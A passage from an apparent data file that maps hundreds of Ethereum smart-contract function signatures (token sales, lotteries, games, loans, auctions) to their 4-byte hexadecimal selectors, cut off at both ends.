"0x936ec951", "printQuotation(int256)": "0xf2b559ac", "set_deposit_manager(address)": "0xce96c8e4", "assetAddresses()": "0x2c915aa3", "channelManagerByAsset(address,address)": "0xcaebb256", "addAsset(address,address)": "0xda489997", "logReputationTokensTransferredCalled()": "0xf946d61c", "logUniverseCreatedCalled()": "0x6c706093", "logUniverseForkedCalled()": "0x2be2ad3c", "logMarketFinalizedCalled()": "0x6b007e4f", "logReportsDisputedCalled()": "0x2634592a", "logMarketCreatedCalled()": "0x51c4e395", "setMiniMeToken(address)": "0x5b45b999", "registerBlog(string)": "0x8921329f", "sendMessage(string,string,string)": "0x0eabeffe", "ShortBlog(string)": "0x04514185", "publishMessage(string,string,string)": "0xe29a2e89", "DevTokensHolderMock(address,address,address)": "0x984ddfe8", "transferlock()": "0x04517225", "transferunlock()": "0xca7430ea", "tokenReserved(address,uint256)": "0x26188437", "wallock()": "0x49f298c6", "walunlock()": "0x84eff1d0", "setupPeriodForICO(uint256,uint256)": "0x7710f29f", "setupPeriodForPreSale(uint256,uint256)": "0x6b8c7180", "CareerXonToken(uint256,uint256,uint256,uint256)": "0xdf247c5d", "Teepee()": "0xf9b207f6", "getAddressSize()": "0xc40d19a5", "hardBurnSMS(address,uint256)": "0x3a4b948f", "drainSMS()": "0xed8bfa4d", "checkMinBalance(address)": "0x8bad5de9", "checkAddress(address)": "0x0ddcfe8e", "giveReward(uint256)": "0x9260e726", "giveAways(address,uint256,uint256)": "0x93720b2f", "transferTokens(address,uint256,uint256)": "0xa9f7e664", "setMembershipPrice(uint256)": "0x69d5f38a", "saleCounterThisPhase()": "0x0df23e5b", "sentBonus()": "0x51973391", "soldToken()": "0x6769d1f9", "extend1Week()": "0xa83f9429", "resumePhase()": "0xa62d7801", "pausePhase()": "0xc8f41706", "endPhase()": "0xd21efc35", "x3Token()": "0x2153bf23", "startManualPeriod(uint256)": "0xc1e70e63", "start3XPhase()": "0x26484a44", "start4NormalPeriod()": "0x5143284d", "start3BonusPeriod3()": "0xd4a34564", "start2BonusPeriod2()": "0x0835b8b2", "start1BonusPeriod1()": "0xc2cdaf24", "calcBonus(uint256)": "0x09f3ad26", "setBonus(uint8,uint8,uint8,uint8)": "0xf754f766", "SMSCoin()": "0xb0bed1e9", "testOverflowResistantFraction()": "0x6f8e1fb6", "testdiv256_128By256()": "0x93f2ba24", "testMul256By256()": "0x8ecd2fe8", "launchnewround()": "0x02238e43", "Divsforall()": "0x85c653ba", "Divs()": "0xe39fff72", "claimdivs()": "0x61829677", "buyp3d(uint256)": "0x6d963a81", "buyDOTCH(uint256)": "0x1c761245", "sellDOTCH(uint256)": "0x11a9c3c2", "collecttaxes(uint256)": "0xc04cc86b", "renewbeginnerprotection(uint256)": "0xd66cb9e1", "support(uint256,uint256)": "0x9be56c67", "preregvills(address)": "0x1522f110", "cheapredeemvillage()": "0x29713f86", "createvillage()": "0x76b3131e", "buysoldiers(uint256)": "0x5fa458b7", "updatesolbuyrate()": "0xb76ce26c", "updatesolsforhire()": "0xcca08d55", "changesoldierreplenishrate(uint256)": "0x4fe8b1a8", "changebeginnerprotection(uint256)": "0x7fe9d39c", "setdivsforall(bool)": "0x0d997dc3", "changetradestatus(bool)": "0xa71ee0c6", "supporthill(uint256)": "0xb17eb9dc", "attackhill(uint256)": "0x9a880848", "hillpayout()": "0xe27671ff", "harvestabledivs()": "0x81d6c866", "OneStandardToken(uint256,string,uint8,string)": "0xfec69a87", "MultiTransaction(address,address[],uint256[])": "0x816fceb7", "CBOPToken(address)": "0xf88339a5", "processAndCheckParam(address,string,uint8[],bytes32[],bytes32[])": "0x08e46cea", "confirmTransaction(address)": "0x4b7b2ed1", "stringToAddr(string)": "0x0eae73dd", "subString(string,uint256,uint256)": "0x7966c431", "TestcoinToken()": "0xfc470105", "destroy(address,address)": "0x62b40f9f", "changeFundingPercentages(uint256,uint256,address)": "0x2b9e98b1", "changeFundingTime(uint256)": "0x82b0627c", "removeAsset(bytes32,address)": "0xe19d36ff", "lockAssetEscrow(bytes32,uint256,address)": "0x284d94e1", "newAsset(uint256,uint256,uint256,bytes32,bytes32,uint256,bytes32)": "0x310bc5fc", "Liutestcoin(uint256,string,uint8,string)": "0x90152ddb", "ERCToken()": "0x30c8a488", "investBct(address)": "0xa6712778", "setFeeDistributionAndStatusThreshold(uint8,uint16[5],uint256)": "0xa445f30d", "howManyFucksGiven(uint256,bool)": "0x37bd0d28", "getCount(uint256)": "0xc2353918", "OeTestCoin()": "0x6b6872c7", "PerlToken()": "0x09bc90a4", "UNINAcoin()": "0x528ef5a1", "ShopDex()": "0xbc523229", "getTicketCounter()": "0x31ce6b47", "getRoundCounter()": "0x28583dcc", "getRoundFinish(uint32)": "0x880a0664", "getRoundIsEnded(uint32)": "0x105ae3bf", "getRoundWinnigNumbers(uint32)": "0x9a82031e", "getRoundEndBlock(uint32)": "0x003a5b06", "getRoundSeedHash(uint32)": "0xd033f913", "getRoundTargetBlock(uint32)": "0xc42ed894", "getRoundDifficultyBlock(uint32)": "0x58cdddf9", "getroundinfo(uint32)": "0x32911111", "getTicketIsPaid(uint256)": "0x5427e8fa", "getTicketRound(uint256)": "0xe73cba34", "getTicketParticipant(uint256)": "0x567c5b70", "getParticipantTickets(address)": "0xa410a7f2", "getTicketNumbers(uint256)": "0x9839eafd", "random(bytes32,uint32,uint256)": "0x55a85240", "endRound(uint256)": "0x5a1e6ca1", "drawNumbers()": "0x676c902f", "isRoundEnd()": "0x444da733", "checkTicket(uint32)": "0x65783c66", "checkMyTicket(uint32)": "0x6e3825d2", "buyTicket(uint32,uint32,uint32,uint32,uint32,uint32)": "0x8a76d99b", "getIsAuth(address)": "0x3cff5b66", "substractBalance(address,uint256)": "0x2aa37a41", "withdrawFromBalance(address,uint256)": "0x3b102248", "depositFunds(address,uint256)": "0x921b004b", "fillChannel(uint256)": "0x9554f920", "setSubscribe()": "0x51fafb72", "setValue()": "0x4fa519fa", "getCurrentAddress()": "0xe717ea61", "CPolloToken()": "0xbed289c9", "WangWangCoin(uint256,string,uint8,string)": "0xfbceff0e", "receiveTokenLoot(uint256,uint256,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xbccc85e6", "TokenLoot(address,address,address,address,address,address,address,address,address,address)": "0x56bdc4ae", "setDEXContractAddress(address)": "0x71b4f4ef", "setMAGContractAddress(address)": "0xdafba12f", "setLUCKContractAddress(address)": "0xb3f22cb4", "setSTGContractAddress(address)": "0xb66d887a", "MNTOKEN()": "0x054726cb", "changePriceUpdateTimeline(uint256)": "0xf22a598f", "setDailyPrices(uint256,uint256)": "0x86bfbd44", "changeAccessTokenFee(address,string,uint256,uint256)": "0x46c13d28", "changeInstallerEscrowAddress(address,string,address)": "0x221b850c", "changeFoundationAddress(address,string,address)": "0x4fdbe2c3", "startDapp(address,address)": "0x1caa5ccb", "getFractionalAmount(uint256,uint256)": "0x93d91eae", "setContractManager(address)": "0xd8dbe4c9", "CPollo()": "0xbab99890", "OMIVIATEST()": "0x1e516c32", "FeemCoin()": "0x33f327be", "buyTokensFromContract(uint256)": "0x8a20d00c", "LOVEYOUToken()": "0x2152c649", "getClaimAmount(address)": "0xdde070e8", "buyForEverybody()": "0xd4607048", "investWithoutId()": "0xdbb833df", "investWithId(uint128)": "0x1fb00cdc", "invest(uint128)": "0xbaeb91ae", "getToken()": "0x21df0da7", "PreICOProxyBuyer(address,uint256,uint256,uint256,uint256)": "0x09ae9452", "isToken()": "0xeefa597b", "assignTokens(address,uint256)": "0x4d7edc15", "isCrowdsaleFull()": "0xd5d09021", "isBreakingCap(uint256,uint256,uint256,uint256)": "0x9d3c663f", "isCrowdsale()": "0x4551dd59", "setOwnerTestValue(uint256)": "0x8d51faec", "getState()": "0x1865c57d", "isPricingSane()": "0x062b01ce", "isFinalizerSane()": "0xa7ba44c3", "isMinimumGoalReached()": "0x7c2e08a3", "loadRefund()": "0x87612102", "setMultisig(address)": "0xf3283fba", "setEndsAt(uint256)": "0x6e50eb3f", "setEarlyParicipantWhitelist(address,bool)": "0xeac24932", "setRequireSignedAddress(bool,address)": "0xed68ff2c", "setRequireCustomerId(bool)": "0x7f7d711e", "buyWithCustomerId(uint128)": "0x99e9376c", "buyWithSignedAddress(uint128,uint8,bytes32,bytes32)": "0xf4869726", "invest(address)": "0x03f9c793", "investWithCustomerId(address,uint128)": "0xef869443", "investWithSignedAddress(address,uint128,uint8,bytes32,bytes32)": "0x1a49803b", "preallocate(address,uint256,uint256)": "0x32013ac3", "investInternal(address,uint128)": "0x96f47800", "finalizeCrowdsale()": "0x0bf318a3", "isSane()": "0x82771c8e", "isFinalizeAgent()": "0x614cb904", "calculatePrice(uint256,uint256,uint256,address,uint256)": "0x18a4155e", "isSane(address)": "0x8e768288", "isPricingStrategy()": "0x04bbc255", "Ownable()": "0x8afc3605", "plus(uint256,uint256)": "0x66098d4f", "minus(uint256,uint256)": "0xf4f3bdc1", "times(uint256,uint256)": "0x1d3b9edf", "min256(uint256,uint256)": "0xb1e9292f", "max256(uint256,uint256)": "0x0c255c94", "min64(uint64,uint64)": "0x36b1315c", "max64(uint64,uint64)": "0x3a4faf7f", "safeDiv(uint256,uint256)": "0xb5931f7c", "needsAllowancePayment()": "0xb6f98e53", "needsInitialization()": "0xb6253539", "needsAdministration()": "0xe1a27ad3", "giver()": "0xfb775b46", "takerCount()": "0xcb6da9da", "borrow(uint256)": "0xc5ebeaec", "principalOutstanding()": "0xc537a210", "takerStatus(address)": "0xc41f4cc0", "takerAddressAt(uint256)": "0xbc99c8be", "fundedPrincipal()": "0xaa8116be", "interestRate()": "0x7c3a00fd", "takers(uint256)": "0x6cbdb7d0", "interestCollected()": "0x5eda5b9a", "isTaker(address)": "0x58f33e98", "expiration()": "0x4665096d", "repay()": "0x402d8883", "interestOwed()": "0x21856b36", "withdrawCollectedInterest()": "0x0edfb0f7", "www_experty_io()": "0xb7090bb5", "experty()": "0x5022e940", "experty_io()": "0x9cc0c5e3", "setVoteRight(address,uint256)": "0xa5e8c5d6", "createAccounts(uint256)": "0xea2c23da", "changeMultisig(address)": "0x2268a358", "Wallet(address,address)": "0x55ee6afb", "collect(uint256)": "0xce3f865f", "Account(address)": "0x30311898", "Controlled()": "0x58e9b208", "acceptOwnership()": "0x79ba5097", "getItemStore(bytes12)": "0xe41cc093", "testGetItemStore()": "0x1649cdcd", "testFailItemStoreNotRegistered()": "0xac767539", "testControlItemStoreNotRegistered()": "0xacb6e9b1", "hola()": "0xcb7acdd9", "tokenFallback(address,address,uint256,bytes)": "0x4c123019", "claim(address,uint256)": "0xaad3ec96", "neverPayBack()": "0x60aeac18", "payBack(address,uint256)": "0xb7019744", "expireLoan()": "0xd334d75b", "lend(address,uint256)": "0xa2fb342d", "LoanStandard(address,address,uint256,uint256,uint256,uint256,uint256)": "0xb0459d49", "asdf()": "0x9f095e88", "press()": "0x5b372532", "forceReleaseAdmin(bytes32)": "0xf3bf93a0", "finalize(bytes32)": "0x92584d80", "bid3(address,uint8[],uint8[])": "0x21462191", "bid3(address,uint256[],uint256[])": "0x6e67b803", "bid(address,uint256[],uint256[])": "0x69f30401", "auctionMinPrice()": "0xe765cb44", "fee()": "0xddca3f43", "ENSRegistrar()": "0xb4628c8a", "feeBase()": "0x95e911a8", "auctionIncreaseBid(bytes32)": "0x801c334e", "auctionMinPriceIncrease()": "0x2c7cce9e", "withdraw(int256[])": "0x4b269a00", "totalTokenMintedPreSale()": "0x9d8a8c43", "crowdsaleStartDate()": "0x2edcc661", "sumHardCapICO()": "0x3dc7c549", "VERSION_NAME()": "0x14442f54", "minGas4Accts()": "0x55485779", "maxFeePercentage()": "0xbf654aac", "oneHundred()": "0x0a6184ce", "tokenRemainCap()": "0x580cf318", "forLoyalty()": "0xf22dbfe6", "ICOEnabled()": "0x97dbfc5a", "fundStorageVault()": "0x115ecc58", "numberOfWagersToFinalTimeout()": "0xb2683aa6", "Goodluckcoin()": "0x9eb51bf1", "ETH_DECIMALS()": "0x92cd1ff2", "fundingPaused()": "0xe4dd7794", "numOfCitizensWhoReceivedDrops()": "0xd7c0302e", "publisherRegistry()": "0x2894ceda", "randaoAddress()": "0x2e038aaf", "PRESALE_BASE_PRICE_IN_WEI()": "0x97e1d68d", "STO_KEY()": "0x6604ca6b", "wagerPool()": "0x404823d1", "phase_3_token_price()": "0x9aa5f467", "allStart()": "0x443f95dc", "marketToken2021()": "0x3b7b9d83", "IS_MAINNET()": "0x39a90f7a", "backupAddress()": "0x019b1576", "Securities_3()": "0xd51d4fa8", "eostContract()": "0x73f9d5a0", "limit7()": "0xdbb98cae", "GOLD_AMOUNT_TPT()": "0x7a060b53", "vote03NoCount()": "0x464066f5", "checkMyTokens()": "0x69658cf3", "eosPizzaSliceSafe()": "0x5ae5b24f", "oversightAddress()": "0x4276016f", "tokensToFunder()": "0x9a347dd9", "MAX_DAILY_SOLO_SPEND()": "0x79624add", "minimowea()": "0x1ac8aa4e", "releaseTokenPrivate()": "0xcf12b725", "dataPerUsd()": "0xd50a04f4", "TimeWeekThree()": "0xa47255d7", "sweepToOwner()": "0xe9eaa69b", "MIN_PURCHASE_OTHERSALES()": "0x7fbe0680", "centsExchangeRate()": "0x2aaefa9f", "nextTokenType()": "0x9dfe29b5", "preIcoSoftCap()": "0xe251e358", "DAYS()": "0xc549e6b9", "redenomiValue()": "0x663c920a", "totalBlocksMined()": "0x50c8dbd2", "RESERVE_PORTION_MULTIPLIER()": "0x8eba2966", "forOwner()": "0x5cf29ecf", "getPurchasableAmount()": "0x4e06369c", "devFee()": "0x6827e764", "tixFounders()": "0x17ffa830", "revealedCurves()": "0x6e4e5c1d", "tripleRoomMin()": "0x9fe9bde0", "DEFAULT_AUCTION_LENGTH()": "0x7d97597d", "Addr4()": "0x606a7f01", "Q()": "0xe493ef8c", "REFUND_LOCK_DURATION()": "0x3e5edb1d", "WEI_CAP()": "0x4d199766", "buyUcCoins()": "0x3761a3d6", "presaleMinPurchase()": "0xc67b599a", "bttsVersion()": "0x89443aac", "numSales()": "0x99aa93c8", "nodeAllocation()": "0x387bef56", "hgs()": "0x7bb3546b", "luckynum()": "0x87b2fe7f", "DISTRIBUTION_TEAM()": "0x384c440b", "vanbexTeamSupply()": "0xacd4bca6", "weiUnlocked()": "0xdefbc073", "setWallet()": "0x971e80cb", "RATE_PRESALE()": "0x9999bd2e", "publicityAddress()": "0x02e49bd9", "times7()": "0x979c2441", "onePotWei()": "0x7a71dee0", "AVAILABLE_JOINTTOKENS()": "0x9a702ad5", "resource()": "0x3a63d886", "PRICE_MULTIPLIER_ICO6()": "0xd8783b04", "icoStartTimestampStage2()": "0x42992dd5", "platAuction()": "0xa9615f59", "powers()": "0x72a20c78", "initialTokensHolder()": "0x2017af61", "complianceWallet()": "0x8861026f", "TOKETH_PRESALE_THREE()": "0x2d9ec349", "SpaceKIMToken()": "0xadc1db89", "BONUS_TIER_1_LIMIT()": "0x9fe14580", "VESTING_INTERVAL()": "0xa5ca2afa", "upgradeEvilMorty()": "0xd3b246d0", "m_currentUsdAccepted()": "0xaae755af", "localRevenuePercent()": "0xabaf9457", "regularHold()": "0x2d6e2bb0", "pauseBuyback()": "0x907f67ee", "inventoryLocked()": "0x16e02e2a", "rewardDenominator()": "0x8509a001", "VULCAN_POD()": "0x079095ae", "fromVersion()": "0x55869af1", "peCap()": "0xcd37dcb8", "curentBallotId()": "0xe4eacd70", "releasedSupply()": "0xb813c627", "operatingFundAddress()": "0xc668ee3d", "isBlacklist(address)": "0x333e99db", "deletefromblacklist(address)": "0xa3a402a7", "addtoblacklist(address)": "0x16f573e6", "migrate(address,uint256,uint256)": "0xfc22d0e5", "buyTicketToDraw(uint256,uint256,address)": "0xbd01c7d5", "addUserRewards(uint256,uint256,address)": "0xe1115aa5", "addWinTickets(uint256,uint256)": "0x1160a807", "addTicketsToDraw(uint256,uint8,uint8)": "0xfc4b01ff", "createLottery(uint256,uint256)": "0xfe35804e", "getCrowdsaleWhitelist()": "0x40556191", "Criptomedicina()": "0x6defe888", "distributeAlliniTokens()": "0xce49735a", "FCOIN1036Token(uint256,string,string,uint256)": "0x2c9619ce", "CZToken(string,string,uint8,uint256)": "0x35ed64c3", "DSHAckCoin()": "0x619cec73", "getCurrentOwner()": "0xa18a186b", "HRCoin()": "0x2ab924d2", "powercontract()": "0x5763e103", "self_last_result()": "0x13b57686", "last_result(address,address)": "0xd9cff93a", "judge(uint8)": "0x07932772", "sha1(bytes)": "0x1605782b", "TMEDsalesToken()": "0x7c1c7860", "sendToken(address,uint256,uint256,uint256)": "0x1d50169c", "_processIncomingEther(address,uint256)": "0xff7070eb", "transfer(address[],uint256)": "0x1939c1ff", "transferAndCall(address,uint256,uint256[])": "0x91da7aa8", "DiipCoin()": "0x5982a6bb", "tokenFallback(address,uint256,uint256[])": "0x9efa776d", "QLANCE2()": "0x030bccb0", "OffMenuMorsel()": "0x99395b1e", "TheFrozenSolidShitCoin()": "0x82e43a3b", "FCOIN0939Token(uint256,string,string,uint256)": "0x3c5bdcc4", "TamasCoin()": "0x1658d496", "INNOToken()": "0x0a00ee41", "activateStore(string,bool)": "0x340e47f8", "setIsNotAdmin(address,bool)": "0x8e70fdbc", "lockStatus(address,bool)": "0x6fe497f0", "calculatePriceForTokens(uint256)": "0x465fa408", "isValidPurchase()": "0xdfdadcb9", "changeMaxTokenSell(uint256)": "0xa777aa5d", "changeMaxGasprice(uint256)": "0xa3a7b804", "StarterTokenSale()": "0xd4c24db7", "StarterToken()": "0x27972b99", "StarterTokenBase()": "0x37f57d05", "incrementBatch(address[])": "0x182b144c", "increment(address,address)": "0xc8291dbd", "AK4Token()": "0x3f9af464", "iconcontract()": "0xb90b0108", "xxx(address)": "0xbc3dde2f", "tokenFallbackTest(address,uint256,bytes)": "0x92b1b418", "receiveApprovalTest(address,uint256,address,bytes)": "0xe2087a44", "sendApprovedTokensToInvestor(address,uint256,string,string)": "0x7edaabd8", "disApprove(address)": "0xbdf9f646", "setReceiverContractAddress(address)": "0xf23c51cd", "togglePrebrdige()": "0x4acceeea", "refill(uint256)": "0xca9d07ba", "addNtf(bytes32,uint256,address)": "0x610c1d68", "getNftsByOwner(address)": "0xe91f9d96", "LiquexPrivateSale()": "0x2f12bc02", "KopiToken()": "0x0d4a690a", "checkAssetListLength()": "0x3abcf3e7", "create(uint256,uint256,uint256,uint256)": "0x92848c9e", "withdrawFromToken(uint256)": "0xeb981fea", "issueTokenAndTransfer(address)": "0xbccf5aa4", "setConfig(uint256,uint256,string,string,uint256,uint256)": "0x00c17ee4", "MyToken(uint256,uint256,string,string,uint256,uint256)": "0x24fe8e68", "TacoCoin()": "0xcd83b57c", "splitter()": "0x3cd8045e", "startLottery()": "0x160344e2", "getKeccak256Uint(uint256,uint256)": "0xfbfd1da4", "getOrderOtherArguments()": "0xd89f9719", "getLogErrorArguments()": "0xff25e16d", "makeLogError(uint8,uint256,uint256)": "0x52e57d1f", "getLogCancelArguments()": "0x051ba270", "makeLogCancel(address,address,address,address,uint256,uint256,uint256)": "0x6e439078", "getLogFillArguments()": "0x51d467f5", "makeLogFill(address,address,address,address,address,uint256,uint256,uint256,uint256,uint256)": "0xe1370365", "getKeccak256Address(address,address)": "0x38aa156c", "_stringToByte(string)": "0xb87f9b98", "_byteToString(bytes32)": "0xf18cbe08", "gameActive(uint256)": "0xdeb06c3a", "zint_now()": "0x03d2e963", "getGameNumSides(uint256)": "0xd6682007", "getSides(uint256,uint256)": "0x27cadd13", "numGames()": "0xc3f010f7", "addGame(string,uint256,bytes32[])": "0x407d0cd0", "getNumSides()": "0x4601cded", "isNotExpired()": "0xac6068b5", "getGameSides()": "0x6e4c42a0", "getGameName()": "0xbbda33d9", "zint_convert(string)": "0x0bb8b9c3", "zint_bytes32ToString(bytes32)": "0x2c76d586", "disApproveUsers(address[])": "0x3431024f", "approveUsers(address[])": "0xb2ab526d", "approveUser(address)": "0xd624fdb6", "EthVerifyCore()": "0x058ab8c9", "airdrop(address[],address)": "0xd14f17f7", "createNewContract(uint256,address,address,address)": "0x57ffd7cc", "SEVENTNET()": "0x6b041da2", "ABYSS(address,address[],address)": "0x5f45c179", "getReservedTokenDestinationList()": "0x73520a2b", "changeAll(address)": "0x0ba7ebe2", "WobToken()": "0xb5aab008", "BigRedCoin()": "0xb4c16970", "setReviveFee(uint256)": "0xf85d9cc7", "ArenplayToken()": "0x406af848", "AlphoTestTokenCoin()": "0x602ea880", "MINEX()": "0x985a882c", "convertGene(uint8[48])": "0x9a47cee3", "setGeneKind(uint8)": "0x835b3720", "GeneScience(address)": "0xc4f2a7af", "HELIX()": "0xc8713608", "ChargeTest()": "0x276ebc6a", "setDestinationAddress(address)": "0x7fa4cacb", "changeReceivingAddress(address)": "0xfd7c074f", "UserWallet(address,address)": "0x57b7247e", "setDepositAddress(address)": "0xab18af27", "collectTokens(address[])": "0x90502c2e", "MangachainToken(address,address,address,address,address)": "0xc8c719d2", "CCChainToken()": "0x63abfd86", "Vish()": "0xe6c2dee8", "LomeliMultilpleTokens()": "0x2f512b6b", "LLX()": "0xfb87bf7b", "VIPCHAINToken()": "0xc7a4e4bc", "TestCoin(uint256,string,string)": "0x6e7a824f", "ARDBatchTransfer()": "0x64db5aa8", "ROYBOITokenIToken()": "0xfe8f4763", "RabtestToken()": "0xb2322c40", "FLOQI()": "0x6c83444d", "daysRemaining()": "0x2a2f7bda", "BIKS(uint256,string,uint8,string)": "0x6c4dfffe", "BitcoinSilver()": "0x990816bb", "JustinsToken()": "0xae2a0ce3", "Global_Currency_Reserve()": "0x09ee3e2a", "gold()": "0xfbec6f21", "goldRate()": "0x706f6496", "inject(address,address)": "0x74fb381a", "paid(address)": "0xa340cf79", "payer(address)": "0xe5b73e08", "Testereumx()": "0xf12001ae", "getMaximumLimit()": "0xf107b5e7", "getMinimumLimit()": "0xb2563a1b", "TestWithdraw()": "0x6cfb782f", "UpdateMaxBalance(uint256)": "0x0b5d69ab", "UpdateMinBalance(uint256)": "0xe2e2e5cf", "testSell()": "0x31c42ca6", "FINX()": "0xf13fc23b", "PTTYC(uint256,string,string)": "0x368b3c81", "getWhitelistStatus(address)": "0xd9ba32fc", "getCrowdsaleStatus()": "0x5cad7cfb", "DenToken()": "0x31e8ebbb", "REGTMProc()": "0x7d961218", "setIsPoop(string)": "0x27567c4c", "ETHERFLEXCrowdsale(address,address)": "0x177e6ae4", "DiminishToken(address,address)": "0x9220d5fa", "OAIToken(address,address)": "0xa1dabfb2", "JJToken()": "0x45af4bc2", "receiveApproval(address,uint256,address,string)": "0x62765eb7", "transferToAdmin()": "0x297f119d", "reVerifiPost(uint256,bool,bool)": "0xfe45c996", "arbifi(uint256,bool)": "0xed07e7b6", "verifiPost(uint256,bool)": "0x578e2f7d", "addPost(uint256,uint256)": "0x83db1548", "WWWToken(uint256,string,string)": "0x3b37044d", "HugMathou()": "0x5af25671", "pornToken()": "0x4ab24cf3", "setMinSlippageFactor(uint256)": "0x82348bab", "houseStatsOf(address)": "0x554d758e", "TTOH()": "0xfff6fb54", "SRHCoin(uint256,string,string)": "0xf35e3945", "_receiveDonation(address,uint256)": "0x9952b63d", "escapeFunds(address,uint256)": "0x1b28591c", "whitelistToken(address,bool)": "0x0ffb1d8b", "donate(uint64,uint64,address,uint256)": "0x4c4316c7", "donate(uint64,uint64)": "0xbde60ac9", "donateAndCreateGiver(address,uint64,address,uint256)": "0x1870c10f", "donateAndCreateGiver(address,uint64)": "0x91f5c3a8", "GivethBridge(address,address,uint256,uint256,address,uint256)": "0xe4db6062", "FailClosedVault(address,address,uint256,uint256,address,uint256)": "0xbdfd582b", "setAllowPaymentsWhenPaused(bool)": "0x71a5367f", "disburseAuthorizedPayments(uint256[])": "0x863da000", "disburseAuthorizedPayment(uint256)": "0x52892478", "authorizePayment(string,bytes32,address,address,uint256,uint256)": "0xf37b74ca", "ShresterToken()": "0xe80c4182", "giveMeBackMyMoney()": "0x80d7d81a", "allergy(string)": "0x72258f96", "isEating(address)": "0xc5d39a33", "isEatingAndDrinking(address)": "0x364cc73e", "balanceOfButter(address)": "0x46d1c605", "isAnOwner(address)": "0x1b0dc452", "addNewOwner(address)": "0x114d8be1", "FrameworkToken()": "0x6f609714", "AVIU()": "0x76703ef1", "BarrosTest()": "0x362e669a", "airdrop(address,address[],uint256)": "0xa1ac727f", "NitinToken()": "0x1c81525c", "granularPreallocate(address,uint256,uint256)": "0xddaa4c48", "ZeonToken()": "0x87127f85", "HACHIROKU()": "0x8e9aed2e", "isTank(address)": "0x8bb87f5b", "removeTank(address)": "0x2cc361a6", "setTank(address)": "0xad8c3cd2", "whenGameDies()": "0xaa462a5a", "getUserOrders(address)": "0x63c69f08", "getBookCount()": "0xd73e0c89", "getOrderCount(address)": "0xd8b86753", "isBlacklist(address,address)": "0x73cf013c", "blacklistParty(address,address,bool)": "0x2cfc42f5", "unlist(uint256)": "0xbf5a4dd3", "buyPerUnit(address,uint256)": "0x69902ffb", "listDda(address,uint256,uint256)": "0x582d6033", "list(address,uint256,uint256)": "0xdda342bb", "GPHToken()": "0xf80d6e90", "NBB()": "0x57693e9a", "EVTCToken(address,uint256)": "0x93ac7c83", "buyFST()": "0x270a5420", "buyFST(address)": "0x9ffa43ce", "buyFST0(address)": "0x27ae949f", "setSalesPipe(address)": "0x6aec82b3", "setFrontWindow(address)": "0xab686d0a", "RABAToken()": "0xd61ccf84", "KinetiQ()": "0x0b9cae77", "simpleAssert(bool)": "0x8da198cd", "getPlayerAff(uint256)": "0x633891c4", "distributeAff(uint256,uint256,uint256,uint256)": "0x5fb135f9", "XAUToken()": "0xc1bf22a9", "COINEIUM()": "0x47963cf8", "LAMP()": "0xa88c0a9f", "mintSupply()": "0x045b7dca", "mint_(address,uint256)": "0x2108292e", "dividendsRightsFixUpdate_(address,uint256)": "0xe83e0359", "releaseDividendsRightsForce(address,uint256)": "0xe9d56d2e", "removeOwner_(address)": "0x92b7bd27", "addOwner_(address)": "0xc86662a3", "acceptDividends(uint256)": "0x31580446", "dividendsRightsFixUpdate_(address,address,uint256)": "0x66d8d040", "releaseDividendsRights_(address,uint256)": "0x0463e4af", "dividendsRightsOf_(address)": "0x4595343f", "getCassetteType_()": "0x983f724b", "releaseAbstractToken_(address,uint256)": "0x06c80102", "acceptAbstractToken_(uint256)": "0x2178139d", "getCassetteSize_()": "0x1db890a6", "transfer_(address,address,uint256)": "0xa1a6d5fc", "releaseDividendsRights(uint256)": "0x104c9cff", "dividendsRightsOf(address)": "0x14074135", "ETHERberry()": "0x5e2d3798", "reclaim_art_token()": "0x7387479e", "getShareBalance()": "0x1de28857", "assignShareTokens(uint256)": "0xcb48e1a5", "calculate_shares_and_return(uint256,uint256,uint256,uint256,uint256,uint256)": "0x5b2d7ad1", "refundLosersBids(uint256)": "0xb5c0c884", "refundIgnoredBids(uint256)": "0xdf0a2bda", "convert_valuation_to_art(uint256,uint256)": "0xa0851928", "computeBids(uint256)": "0x6dcd16d7", "resetAppendDecryptedBids(uint256)": "0x0ed40dff", "appendDecryptedBids(uint256[],uint256[],uint256[],address[],address,uint256[],uint256[],uint256[])": "0xdc0bd38e", "appendDecryptedBid(uint256,uint256,uint256,address,address,uint256,uint256,uint256)": "0x2b5af004", "burnBid(uint256)": "0x8f8eb474", "getBidHash(uint256,uint256,address,address,uint256,uint256)": "0xc8fca35e", "appendEncryptedBid(bytes32,uint256)": "0x22bc0d6c", "setFundraiseLimits(uint256,uint256)": "0xdc5c3e06", "getHistoricalPrice(uint256)": "0xc6f47486", "UbexToken()": "0x060f3102", "omec(uint256,string,string)": "0x6949ed67", "setBatchLimit(uint32)": "0x6a7c0e81", "NamCoin(address)": "0x98b3dfd6", "transferCollectedEther(address)": "0x27566b80", "setUnitsOneEthCanBuy(uint256)": "0xcc8bd060", "ValueToken(uint256,string,string)": "0x341b9cc2", "unlockup(address)": "0x27ce6fa9", "setReservefund(uint256)": "0xcc8818f6", "FDataToken()": "0xbb3e443b", "changeCEO(address)": "0x10947164", "ZEEWANTtoken()": "0x95441f9f", "addVersion(address,string,string)": "0x62d020d9", "addEmitter(bytes4,address)": "0x13426d87", "getOwned()": "0xc3027525", "CRBTTokenLive()": "0xc4c4d00b", "KaiKuangChain(uint256,string,string)": "0x5b528aaf", "byteToLower(bytes1)": "0x2663a4ed", "sanToLower(string)": "0xa4201125", "isValidSan(string)": "0x33e3e86a", "_sanMint(uint256,address,string,string)": "0x6bfdd3dd", "sanitize(string)": "0xb54e7a4a", "specialSanMint(string,string,address,address)": "0xb3fc34d4", "emptyEther()": "0x922f17ce", "emptyTTT()": "0x48a87fa8", "setMarketAddress(address)": "0xfae92612", "ownerAddSanSlotBatch(address[],uint256[])": "0x67fbb7ba", "ownerAddSanSlot(address,uint256)": "0xab91154e", "setSanMaxFree(uint256)": "0x4d40ed9c", "setSanMaxAmount(uint256)": "0x2317f9f3", "setSanLength(uint256,uint256)": "0x50b79722", "setSanTTTCost(uint256)": "0x2712d916", "marketSale(uint256,string,address,address)": "0x32c35352", "buySanSlot(address,uint256)": "0x6dd6e673", "getSANitized(string)": "0x41c838cb", "getSanSlots(address)": "0xa9eeaeee", "getAddressFromSan(string)": "0xb70fadb7", "getDataPointForSubject(uint256,uint256,int256)": "0xa2f4f550", "mintSendTokens()": "0xfaf9b5cf", "getMintForReportingParticipantAmountValue()": "0xf91bcd76", "mint(address,string)": "0xd0def521", "getHint(uint256)": "0x2344e4ec", "GlobalConstraintRegistrar()": "0xd9f58923", "multiMint(uint256[])": "0x9a0e4ebb", "addDataPoint(uint256,bool,string)": "0xb51051d4", "test_insert_findNoHintAtPosition()": "0xb9f9d9a5", "addMeterPoint(address,int256)": "0xaa4cd810", 